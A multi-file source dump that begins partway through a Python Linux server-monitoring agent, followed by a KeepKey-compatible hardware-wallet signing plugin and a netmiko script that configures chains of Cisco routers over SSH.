except Exception as err:
logger.error('The number of CPU is not found.')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "cpu cores" | uniq').readlines()[0]
cpu_core = int(result.strip().split(':')[1].strip())
logger.info(f'The number of cores per CPU is {cpu_core}')
except Exception as err:
logger.error('The number of cores per CPU is not found.')
logger.error(err)
result = os.popen('cat /proc/cpuinfo| grep "processor"| wc -l').readlines()[0]
self.cpu_cores = int(result)
logger.info(f'The number of cores all CPU is {self.cpu_cores}')
if cpu_model and cpu_num and cpu_core:
self.cpu_info = f'{cpu_num} CPU(s), {cpu_core} core(s) pre CPU, total {self.cpu_cores} cores, ' \
f'CPU model is {cpu_model} '
elif cpu_model:
self.cpu_info = f'total CPU cores is {self.cpu_cores}, CPU model is {cpu_model} '
else:
self.cpu_info = f'total CPU cores is {self.cpu_cores}'
@handle_exception(is_return=True)
def get_total_mem(self):
"""
Get Memory
:return:
"""
result = os.popen('cat /proc/meminfo| grep "MemTotal"').readlines()[0]
self.total_mem = float(result.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024
self.total_mem_100 = self.total_mem / 100
logger.info(f'The total memory is {self.total_mem}G')
@handle_exception()
def get_disks(self):
"""
Get all disks number.
:return:
"""
result = os.popen('iostat -x -k').readlines()
if result:
disk_res = [line.strip() for line in result if len(line) > 5]
for i in range(len(disk_res)):
if 'Device' in disk_res[i]:
for j in range(i + 1, len(disk_res)):
disk_line = disk_res[j].split()
self.all_disk.append(disk_line[0])
logger.info(f'The system has {len(self.all_disk)} disks, disk number is {"、".join(self.all_disk)}')
else:
raise Exception('The system does not support the iostat, please install sysstat. ')
    @handle_exception(is_return=True)
    def get_system_nic(self):
        """
        Get the active network card by diffing two /proc/net/dev snapshots
        taken one second apart: a card whose byte counters changed is in use.
        Only one network card can be got. If the system uses multiple network
        cards, only the first one can be got. Use "cat /proc/net/dev" to view
        the order of the network cards.
        :return:
        """
        network_card = []
        result = os.popen('cat /proc/net/dev').readlines()  # get network data
        logger.debug(f'The result for the first time is: {result}')
        time.sleep(1)
        result1 = os.popen('cat /proc/net/dev').readlines()  # get network data again
        logger.debug(f'The result for the second time is: {result1}')
        for i in range(len(result)):
            if ':' in result[i]:
                data = result[i].split()
                data1 = result1[i].split()
                # Compare only when both snapshots refer to the same interface.
                if data[0] == data1[0]:
                    logger.debug(f'The first data change is {data}')
                    logger.debug(f'The second data change is {data1}')
                    if data[1] != data1[1] or data[9] != data1[9]:  # If the data of network card changes, it means that the card is in use.
                        network_card.append(data[0].strip(':'))
        logger.debug(f'The data of network card is {network_card}')
        if 'lo' in network_card:  # 'lo' is 127.0.0.1, need to be deleted.
            network_card.pop(network_card.index('lo'))
        if len(network_card) > 0:
            self.nic = network_card[0]
            logger.info(f'The network card in use is {self.nic}')
        else:
            logger.error('The network card in use is not found.')
@handle_exception(is_return=True)
def get_total_disk_size(self):
"""
Get disk size
:return:
"""
result = os.popen('df -m').readlines()
logger.debug(f'The data of disk is {result}')
for line in result:
res = line.split()
if '/dev/' in res[0]:
size = float(res[1])
self.total_disk += size
logger.debug(f'The disks total size is {self.total_disk}M')
self.total_disk_h = self.total_disk / 1024
if self.total_disk_h > 1024:
total = round(self.total_disk_h / 1024, 2)
self.total_disk_h = f'{total}T'
else:
total = round(self.total_disk_h, 2)
self.total_disk_h = f'{total}G'
logger.info(f'The total size of disks is {self.total_disk_h}')
@handle_exception(is_return=True, default_value=0)
def get_used_disk_rate(self):
"""
Get disks usage
:return:
"""
used_disk_size = 0
result = os.popen('df -m').readlines()
logger.debug(f'The data of disk is {result}')
for line in result:
res = line.split()
if '/dev/' in res[0]:
size = float(res[2])
used_disk_size += size
logger.info(f'The used size of disks is {used_disk_size}M')
return used_disk_size / self.total_disk
@handle_exception(is_return=True)
def get_system_net_speed(self):
"""
Get bandwidth, Mbs
:return:
"""
if self.nic:
result = os.popen(f'ethtool {self.nic}').readlines()
logger.debug(f'The bandwidth is {result}')
for line in result:
if 'Speed' in line:
logger.debug(f'The bandwidth is {line}')
res = re.findall(r"(\d+)", line)
speed = int(res[0])
if 'G' in line:
speed = speed * 1024
if 'K' in line:
speed = speed / 1024
self.network_speed = speed
break
logger.info(f'The bandwidth of ethernet is {self.network_speed}Mb/s')
    @handle_exception(is_return=True)
    def get_system_version(self):
        """
        Get system version: prefer the RedHat-family release string, fall back
        to parsing the distro name out of the kernel's gcc build banner.
        :return:
        """
        try:
            result = os.popen('cat /etc/redhat-release').readlines()  # system release version
            logger.debug(f'The system release version is {result}')
            self.system_version = result[0].strip()
        except Exception as err:
            # Not a RedHat-family system; derive the distro from /proc/version.
            logger.warning(err)
            result = os.popen('cat /proc/version').readlines()[0]  # system kernel version
            logger.debug(f'The system kernel version is{result}')
            # The parenthesised token after "gcc" usually names the distro build.
            res = re.findall(r"gcc.*\((.*?)\).*GCC", result.strip())
            if res:
                self.system_version = res[0]
            else:
                res = re.findall(r"gcc.*\((.*?)\)", result.strip())
                self.system_version = res[0]
        logger.info(f'system release/kernel version is {self.system_version}')
@handle_exception(is_return=True, default_value=0)
def get_RetransSegs(self):
"""
Get the number of TCP RetransSegs
:return:
"""
Retrans = 0
if self.isTCP:
result = os.popen('cat /proc/net/snmp |grep Tcp').readlines()
tcps = result[-1].split()
logger.debug(f'The TCP is: {tcps}')
Retrans = int(tcps[-4])
return Retrans
def is_java_server(self, port):
"""
Determine whether the port is java service
:param port: port
"""
pid = port_to_pid(port)
try:
result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1]
res = result.strip().split(' ')
logger.info(f'The JVM of {pid} is {res}')
_ = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7])
self.is_java.update({str(port): 1})
except Exception as err:
logger.warning(err)
self.is_java.update({str(port): 0})
def check_sysstat_version(self):
    """
    Verify that the installed sysstat tools (iostat and pidstat) are major
    version 12 or newer.

    :raises Exception: when a tool is missing or its major version is < 12
    """
    # The two checks were previously copy-pasted; delegate to one helper.
    self._verify_sysstat_tool('iostat')
    self._verify_sysstat_tool('pidstat')

def _verify_sysstat_tool(self, tool):
    """
    Check the major version of a single sysstat tool.

    :param tool: command name, e.g. 'iostat' or 'pidstat'
    :raises Exception: when the tool is absent (no version output) or its
        major version is < 12
    """
    download_hint = 'http://sebastien.godard.pagesperso-orange.fr/download.html'
    try:
        # "<tool> -V" prints e.g. "sysstat version 12.1.5"; keep the major number.
        version = os.popen(f"{tool} -V |grep ysstat |awk '{{print $3}}' |awk -F '.' '{{print $1}}'").readlines()[0]
        v = int(version.strip())
    except IndexError:
        # No output at all: sysstat is not installed (or too old to match).
        logger.error(traceback.format_exc())
        msg = f'Please install or upgrade sysstat to version 12+, download link: {download_hint}'
        logger.error(msg)
        raise Exception(msg)
    if v < 12:
        msg = f'The {tool} version is too low, please upgrade to version 12+, download link: {download_hint}'
        logger.error(msg)
        raise Exception(msg)
@handle_exception(is_return=True)
def clear_port(self):
    """
    Clean up ports that have been stopped monitoring: stop every monitor,
    reset the per-port state, then restart only the ports that were still
    actively monitored.
    :return:
    """
    stop_num = self._msg['isRun'].count(0)
    if stop_num > 0:
        # Snapshot the current port table before mutating it.
        port_list = copy.deepcopy(self._msg)
        # stop all monitoring
        for ind in range(len(self._msg['port'])):
            if self._msg['isRun'][ind] > 0:
                self._msg['isRun'][ind] = 0
        self.FGC = {}  # reset FGC times
        self.FGC_time = {}  # reset FGC time
        self.is_java = {}
        time.sleep(self.port_interval + 5)  # Wait for all ports to stop monitoring
        self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []}
        # Start monitoring again (property setter `start` re-registers a port).
        for ind in range(len(port_list['port'])):
            if port_list['isRun'][ind] > 0:
                self.start = {'port': port_list['port'][ind], 'pid': port_list['pid'][ind], 'is_run': 1}
        del port_list
        logger.info('Successfully clean up the ports that stopped monitoring.')
    else:
        logger.info('There is no port that stoped monitoring.')
def register_agent(self, disk_flag=True):
    """
    Timed task loop. Re-registers this agent with the server every ~8s,
    triggers the daily port cleanup at self.timeSetting, and checks disk
    usage every 5 minutes (optionally alerting by email).
    disk_flag: Whether to send email when disk space usage is too high.
    :param
    :return:
    """
    url = f'http://{cfg.getServer("address")}/Register'
    header = {
        "Accept": "application/json, text/plain, */*",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/json; charset=UTF-8"}
    post_data = {
        'host': self.IP,
        'port': cfg.getAgent('port'),
        'system': self.system_version,
        'cpu': self.cpu_cores,
        'cpu_usage': self.cpu_usage,
        'nic': self.nic,
        'network_speed': self.network_speed,
        'mem': round(self.total_mem, 2),
        'mem_usage': self.mem_usage,
        'disk_size': self.total_disk_h,
        'disk_usage': self.get_used_disk_rate(),
        'disks': ','.join(self.all_disk)
    }
    start_time = time.time()
    disk_start_time = time.time()
    while True:
        try:
            if time.time() - start_time > 8:  # register
                # Refresh the live metrics before each heartbeat.
                post_data['cpu_usage'] = self.cpu_usage
                post_data['mem_usage'] = self.mem_usage
                res = requests.post(url=url, json=post_data, headers=header)
                logger.info(f"The result of registration is {res.content.decode('unicode_escape')}")
                start_time = time.time()
            if time.strftime('%H:%M') == self.timeSetting:  # clean up
                logger.debug('Cleaning up the ports that stopped monitoring.')
                self.clear_port()
            if time.time() - disk_start_time > 300:
                disk_usage = self.get_used_disk_rate()
                if disk_usage:
                    post_data['disk_usage'] = disk_usage  # disk space usage, without %
                    disk_start_time = time.time()
                    if self.maxDiskUsage < disk_usage:
                        # NOTE(review): disk_usage/100 suggests disk_usage is scaled by
                        # 100 relative to a percentage — confirm against get_used_disk_rate.
                        msg = f"The disk space usage is {disk_usage/100:.2f}%, it is too high. Server IP is {self.IP}"
                        logger.warning(msg)
                        if self.isDiskAlert and disk_flag:
                            disk_flag = False  # Set to False to prevent cleaning up cache continuously
                            thread = threading.Thread(target=notification, args=(msg,))
                            thread.start()
                    else:
                        disk_flag = True
            time.sleep(5)
        except(Exception):
            logger.error(traceback.format_exc())
            time.sleep(1)
def clear_cache(self):
    """
    Drop the kernel page/dentry/inode caches by writing self.echo to
    /proc/sys/vm/drop_caches (requires root).
    :return:
    """
    logger.info(f'Start Cleaning up cache: echo {self.echo} > /proc/sys/vm/drop_caches')
    os.popen(f'echo {self.echo} > /proc/sys/vm/drop_caches')
    logger.info('Clear the cache successfully.')
def __del__(self):
pass
@handle_exception(is_return=True)
def port_to_pid(port):
    """
    Get pid based on port, by parsing `netstat -nlp` for a listening socket
    bound exactly to that port.
    :param port: port
    :return: pid (str) or None when no exact match is found
    """
    pid = None
    result = os.popen(f'netstat -nlp|grep {port}').readlines()
    logger.debug(f'The result of the port {port} is {result}')
    flag = f':{port}'
    # Keep only lines actually mentioning ":<port>" (grep may over-match).
    res = [line.strip() for line in result if flag in line]
    logger.debug(res[0])
    p = res[0].split()
    # Column 3 is the local address, e.g. "0.0.0.0:8080" -> compare the port part.
    pp = p[3].split(':')[-1]
    if str(port) == pp:
        # The "pid/program" field follows the LISTEN state column.
        pid = p[p.index('LISTEN') + 1].split('/')[0]
    logger.info(f'The pid of the port {port} is {pid}.')
    return pid
@handle_exception(is_return=True)
def notification(msg):
    """
    Send an alert email by POSTing the message to the server's
    /Notification endpoint.
    :param msg: Email body
    :return:
    """
    url = f'http://{cfg.getServer("address")}/Notification'
    header = {
        "Accept": "application/json, text/plain, */*",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/json; charset=UTF-8"}
    post_data = {
        'host': get_ip(),
        'msg': msg
    }
    logger.debug(f'The content of the email is {msg}')
    res = requests.post(url=url, json=post_data, headers=header)
    if res.status_code == 200:
        # HTTP succeeded; the application-level result is in the JSON body.
        response = json.loads(res.content.decode())
        if response['code'] == 0:
            logger.info('Send email successfully.')
        else:
            logger.error(response['msg'])
    else:
        logger.error('Failed to send mail.')
|
plugin.py | import threading
from binascii import hexlify, unhexlify
from bitcoinnano.util import bfh, bh2u
from bitcoinnano.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from bitcoinnano.i18n import _
from bitcoinnano.plugins import BasePlugin
from bitcoinnano.transaction import deserialize
from bitcoinnano.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
    # Keystore backed by a KeepKey/Trezor-compatible hardware device; all
    # signing is delegated to the paired device client via the plugin.

    def get_derivation(self):
        # BIP32 derivation path prefix for this keystore.
        return self.derivation

    def get_client(self, force_pair=True):
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        # These devices do not support message decryption.
        raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)

    def sign_message(self, sequence, message, password):
        """Sign `message` with the key at <derivation>/<change>/<index>."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """Collect previous txs and xpub paths, then sign `tx` on-device."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    # Only our own master xpub gets a known derivation path.
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
    # Base plugin for KeepKey/Trezor-compatible hardware wallets.
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    #    libraries_available, libraries_URL, minimum_firmware,
    #    wallet_class, ckd_public, types, HidTransport

    # Maximum length the device accepts for a wallet label.
    MAX_LABEL_LEN = 32

    def __init__(self, parent, config, name):
        HW_PluginBase.__init__(self, parent, config, name)
        self.main_thread = threading.current_thread()
        # FIXME: move to base class when Ledger is fixed
        if self.libraries_available:
            self.device_manager().register_devices(self.DEVICE_IDS)

    def _try_hid(self, device):
        """Attempt a raw USB HID transport to `device`; None on failure."""
        self.print_error("Trying to connect over USB...")
        if device.interface_number == 1:
            pair = [None, device.path]
        else:
            pair = [device.path, None]
        try:
            return self.hid_transport(pair)
        except BaseException as e:
            # see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
            # raise
            self.print_error("cannot connect at", device.path, str(e))
            return None

    def _try_bridge(self, device):
        """Attempt a Trezor Bridge transport to `device`; None on failure."""
        self.print_error("Trying to connect over Trezor Bridge...")
        try:
            return self.bridge_transport({'path': hexlify(device.path)})
        except BaseException as e:
            self.print_error("cannot connect to bridge", str(e))
            return None

    def create_client(self, device, handler):
        """Create a device client over HID, sanity-ping it and verify firmware."""
        # disable bridge because it seems to never returns if keepkey is plugged
        #transport = self._try_bridge(device) or self._try_hid(device)
        transport = self._try_hid(device)
        if not transport:
            self.print_error("cannot connect to device")
            return
        self.print_error("connected to device at", device.path)
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.print_error("ping failed", str(e))
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated %s firmware for device labelled %s. Please '
                     'download the updated firmware from %s') %
                   (self.device, client.label(), self.firmware_URL))
            self.print_error(msg)
            handler.show_error(msg)
            return None
        return client

    def get_client(self, keystore, force_pair=True):
        """Return (and mark used) the paired client for `keystore`."""
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client

    def get_coin_name(self):
        return "Testnet" if NetworkConstants.TESTNET else "Bitcoin"

    def initialize_device(self, device_id, wizard, handler):
        """Ask the user how to seed the device, then run init in a thread."""
        # Initialization method
        msg = _("Choose how you want to initialize your %s.\n\n"
                "The first two methods are secure as no secret information "
                "is entered into your computer.\n\n"
                "For the last two methods you input secrets on your keyboard "
                "and upload them to your %s, and so you should "
                "only do those on a computer you know to be trustworthy "
                "and free of malware."
                ) % (self.device, self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
            (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
            (TIM_PRIVKEY, _("Upload a master private key"))
        ]

        def f(method):
            import threading
            settings = self.request_trezor_init_settings(wizard, method, self.device)
            # Run device initialization off the GUI thread; the wizard's
            # event loop blocks until _initialize_device calls loop.exit().
            t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
            t.setDaemon(True)
            t.start()
            wizard.loop.exec_()

        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)

    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Perform the chosen initialization (new/recover/mnemonic/xprv) on-device."""
        item, label, pin_protection, passphrase_protection = settings
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
        wizard.loop.exit(0)

    def setup_device(self, device_info, wizard):
        '''Called when creating a new wallet. Select the device to use. If
        the device is uninitialized, go through the intialization
        process.'''
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        client.get_xpub('m', 'standard')
        client.used()

    def get_xpub(self, device_id, derivation, xtype, wizard):
        """Fetch the xpub at `derivation` from the device."""
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        client.handler = wizard
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub

    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Sign `tx` on-device and splice the signatures back into it."""
        self.prev_tx = prev_tx
        self.xpub_path = xpub_path
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True)
        outputs = self.tx_outputs(keystore.get_derivation(), tx)
        signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
        raw = bh2u(signed_tx)
        tx.update_signatures(raw)

    def show_address(self, wallet, address):
        """Display `address` on the device screen for user verification."""
        client = self.get_client(wallet.keystore)
        if not client.atleast_version(1, 3):
            wallet.keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = wallet.keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        script_type = self.types.SPENDADDRESS
        client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)

    def tx_inputs(self, tx, for_sig=False):
        """Convert tx inputs to device protobuf TxInputType messages."""
        inputs = []
        for txin in tx.inputs():
            txinputtype = self.types.TxInputType()
            if txin['type'] == 'coinbase':
                prev_hash = "\0"*32
                prev_index = 0xffffffff  # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    if len(x_pubkeys) == 1:
                        # Single-sig input: derive the path for our key.
                        x_pubkey = x_pubkeys[0]
                        xpub, s = parse_xpubkey(x_pubkey)
                        xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                        txinputtype.address_n.extend(xpub_n + s)
                        txinputtype.script_type = self.types.SPENDADDRESS
                    else:
                        # Multisig input: build the redeem-script description.
                        def f(x_pubkey):
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                            else:
                                xpub = xpub_from_pubkey(0, bfh(x_pubkey))
                                s = []
                            node = self.ckd_public.deserialize(xpub)
                            return self.types.HDNodePathType(node=node, address_n=s)
                        pubkeys = map(f, x_pubkeys)
                        multisig = self.types.MultisigRedeemScriptType(
                            pubkeys=pubkeys,
                            signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
                            m=txin.get('num_sig'),
                        )
                        script_type = self.types.SPENDMULTISIG
                        txinputtype = self.types.TxInputType(
                            script_type=script_type,
                            multisig=multisig
                        )
                        # find which key is mine
                        for x_pubkey in x_pubkeys:
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                                if xpub in self.xpub_path:
                                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                    txinputtype.address_n.extend(xpub_n + s)
                                    break
                prev_hash = unhexlify(txin['prevout_hash'])
                prev_index = txin['prevout_n']
            if 'value' in txin:
                txinputtype.amount = txin['value']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index
            if 'scriptSig' in txin:
                script_sig = bfh(txin['scriptSig'])
                txinputtype.script_sig = script_sig
            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
            inputs.append(txinputtype)
        return inputs

    def tx_outputs(self, derivation, tx):
        """Convert tx outputs to device protobuf TxOutputType messages."""
        outputs = []
        has_change = False
        for _type, address, amount in tx.outputs():
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                has_change = True  # no more than one change address
                addrtype, hash_160 = b58_address_to_hash160(address)
                index, xpubs, m = info
                if len(xpubs) == 1:
                    # Single-sig change output: device derives the address itself.
                    script_type = self.types.PAYTOADDRESS
                    address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
                    txoutputtype = self.types.TxOutputType(
                        amount = amount,
                        script_type = script_type,
                        address_n = address_n,
                    )
                else:
                    # Multisig change output.
                    script_type = self.types.PAYTOMULTISIG
                    address_n = self.client_class.expand_path("/%d/%d"%index)
                    nodes = map(self.ckd_public.deserialize, xpubs)
                    pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
                    multisig = self.types.MultisigRedeemScriptType(
                        pubkeys = pubkeys,
                        signatures = [b''] * len(pubkeys),
                        m = m)
                    txoutputtype = self.types.TxOutputType(
                        multisig = multisig,
                        amount = amount,
                        address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
                        script_type = script_type)
            else:
                # Regular (non-change) output: pass the address/script through.
                txoutputtype = self.types.TxOutputType()
                txoutputtype.amount = amount
                if _type == TYPE_SCRIPT:
                    txoutputtype.script_type = self.types.PAYTOOPRETURN
                    txoutputtype.op_return_data = address[2:]
                elif _type == TYPE_ADDRESS:
                    addrtype, hash_160 = b58_address_to_hash160(address)
                    if addrtype == NetworkConstants.ADDRTYPE_P2PKH:
                        txoutputtype.script_type = self.types.PAYTOADDRESS
                    elif addrtype == NetworkConstants.ADDRTYPE_P2SH:
                        txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
                    else:
                        raise BaseException('addrtype: ' + str(addrtype))
                    txoutputtype.address = address
            outputs.append(txoutputtype)
        return outputs

    def bitcoinnano_tx_to_txtype(self, tx):
        """Convert a wallet transaction to the device TransactionType message."""
        t = self.types.TransactionType()
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        inputs = self.tx_inputs(tx)
        t.inputs.extend(inputs)
        for vout in d['outputs']:
            o = t.bin_outputs.add()
            o.amount = vout['value']
            o.script_pubkey = bfh(vout['scriptPubKey'])
        return t

    # This function is called from the trezor libraries (via tx_api)
    def get_tx(self, tx_hash):
        tx = self.prev_tx[tx_hash]
        return self.bitcoinnano_tx_to_txtype(tx)
|
module_scan.py | #!/usr/bin/env python3
from detecta import *
from ssh_connect import *
import os
import re
import netifaces as ni
import json
from threading import Thread
from netmiko import ConnectHandler
# Module-wide state shared across the scanning threads.
re_n={}  # per-host routing/interface table (legacy, populated by commented-out code)
routers= {}  # hostname -> discovered data (Neighbors, Interfaces, Ip, ...)
known_routers = []  # short hostnames already visited during discovery
threads= []  # top-level worker threads
routers_Code= {}  # hostname -> raw command outputs collected over SSH
routers_alreadyConfigured= []  # hostnames already configured (avoid duplicates)
amountOfRouters= 0
# Prototype of a Cisco router connection (netmiko device dict)
cisco={
    "device_type":"cisco_xe",
    "ip":"",
    "username":"",
    "password":"",
    "secret":""
}
class dataToRouter:
    """Configures one router through a bridged (hopped) SSH session and
    recursively spawns threads to configure its not-yet-seen neighbors."""

    def __init__(self, ip_direct, previousRouter, hostname, net_connect):
        # ip_direct: IP to ssh into; previousRouter: hostname we hop from;
        # net_connect: an already-open netmiko connection to hop through.
        self.ip_direct= ip_direct
        self.hostname= hostname
        self.previousRouter= previousRouter
        self.direcciones= []
        self.interfaces= []
        self.it= {}
        self.net_connect= net_connect

    def set_data(self, k, cmd, rawCmdInstructions, willUsePredefinedConnection):
        # k: previous hop IP; cmd: command template list (index 0 is rewritten);
        # willUsePredefinedConnection: reuse self.net_connect instead of opening a new one.
        self.k= k
        self.cmd= cmd
        self.rawCmdInstructions= rawCmdInstructions
        self.willUsePredefinedConnection= willUsePredefinedConnection

    def sendDataToRouter(self):
        # Makes the bridged connection from one router to the next router.
        print(f"Realizando conexión bridge entre {self.k} y {self.ip_direct}")
        self.cmd[0]= f"ssh -l admin {self.ip_direct}"
        #print('Intentará crear la conexión con: ', cisco, ' primer instruccion: ', self.cmd[0])
        if self.willUsePredefinedConnection:
            self.net_connect= self.net_connect
        else:
            self.net_connect= ConnectHandler(**cisco)
        #net_connect = ConnectHandler(**cisco)
        #print('Se hizo la conexión')
        #net_connect.enable()
        self.cmd[0]= f"ssh -l admin {self.ip_direct}"
        print('Conexión hecha con ', self.hostname, ' con comando ', self.cmd[0])
        # cmd[0]=ssh hop, cmd[1]=password, cmd[2..3]=setup commands.
        routers_Code[self.hostname]= []
        routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[0], expect_string=r'Password:'))
        tempVar= self.hostname.split('.')
        print(f'Valor recibido actualmente en {self.hostname} es {routers_Code[self.hostname][0]}')
        print('Espera conexión con: ', tempVar[0], ' con la clave: ', self.cmd[1], ' esperando a ', self.hostname.split('.')[0]+'#')
        routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[1], expect_string=r''+self.hostname.split('.')[0]+'#'))
        print(f'Espera ejecutar...1 en {self.hostname}')
        routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[2]))
        print(f'Espera ejecutar...2 en {self.hostname}')
        routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[3]))
        #self.output.append(self.net_connect.send_command(self.cmd[1], expect_string=r''+self.hostname.split('.')[0]+'#'))
        #self.output.append(self.net_connect.send_command(self.cmd[2]))
        #self.output.append(self.net_connect.send_command(self.cmd[3]))
        print(f'Dentro del OUTPUT de {self.hostname}: {routers_Code[self.hostname]}')
        routers[self.hostname]['Ip']= self.ip_direct
        # Fan out: configure each unseen neighbor in its own thread.
        threadsInner= []
        for key, values in routers[self.hostname]['Neighbors'].items():
            if key not in routers_alreadyConfigured:
                print(f'Elemento aceptado dentro de {self.hostname}: ', values)
                routers_alreadyConfigured.append(key)
                #global amountOfRouters
                #amountOfRouters= amountOfRouters + 1
                router= dataToRouter(values, self.hostname, key, ConnectHandler(**cisco))
                router.set_data(self.ip_direct, self.rawCmdInstructions, self.rawCmdInstructions, False)
                #global threads
                #threads.append(Thread(target=process,args=(router,)))
                #threads[-1].start()
                threadsInner.append(Thread(target=process,args=(router,)))
                threadsInner[-1].start()
                #threadsInner[-1].join()
            #else:
                #routers[self.hostname]['Neighbors'][key]= self.k
        for t in range(len(threadsInner)):
            threadsInner[t].join()
        self.cmd= self.cmd
        #print(f'El router {self.hostname} tendrá comandos especiales? {self.willUsePredefinedConnection}')
        if self.willUsePredefinedConnection is False:
            routers_Code[self.hostname].append(self.net_connect.send_command_timing(self.cmd[4]))
            #for i in range(len(self.cmd)):
                #print(f'Comando a anotar del router {self.hostname}: ', self.cmd[i])
                #routers_Code[self.hostname].append(self.net_connect.send_command_timing(self.cmd[i]))
                #self.output.append(self.net_connect.send_command(self.cmd[i]))
        else:
            routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[4]))
            print(f'Comandos a revisar: {self.cmd}')
            for i in range(5, len(self.cmd)):
                print(f'Comando a anotar del router {self.hostname}: ', self.cmd[i])
                routers_Code[self.hostname].append(self.net_connect.send_command_timing(self.cmd[i]))
                #self.output.append(self.net_connect.send_command(self.cmd[i]))
        print(f'\n\nOUTPUT Router {self.hostname}: ', routers_Code[self.hostname])
        #output=conectar_bridge(cisco,self.cmd)
        """
        # Se obtienen sus datos como tabla de enrutamiento para realizar las configuraciones más tarde
        host=re.split("#|\n| ",self.output[-2])[1]
        dir=re.split("\n| YES NVRAM up up | YES manual up up | ",self.output[-3])
        inte=re.split("\n| Internet address is | ",self.output[-4])
        sub_n=[]
        self.interfaces= []
        self.direcciones= []
        for i in range(len(dir)):
            if ""!=dir[i] and "R" not in dir[i]:
                self.direcciones.append(dir[i])
        for i in range(len(inte)):
            if ""!=inte[i] and "R" not in inte[i]:
                self.interfaces.append(inte[i])
                sub=inte[i].split("/")
                pr=sub[1]
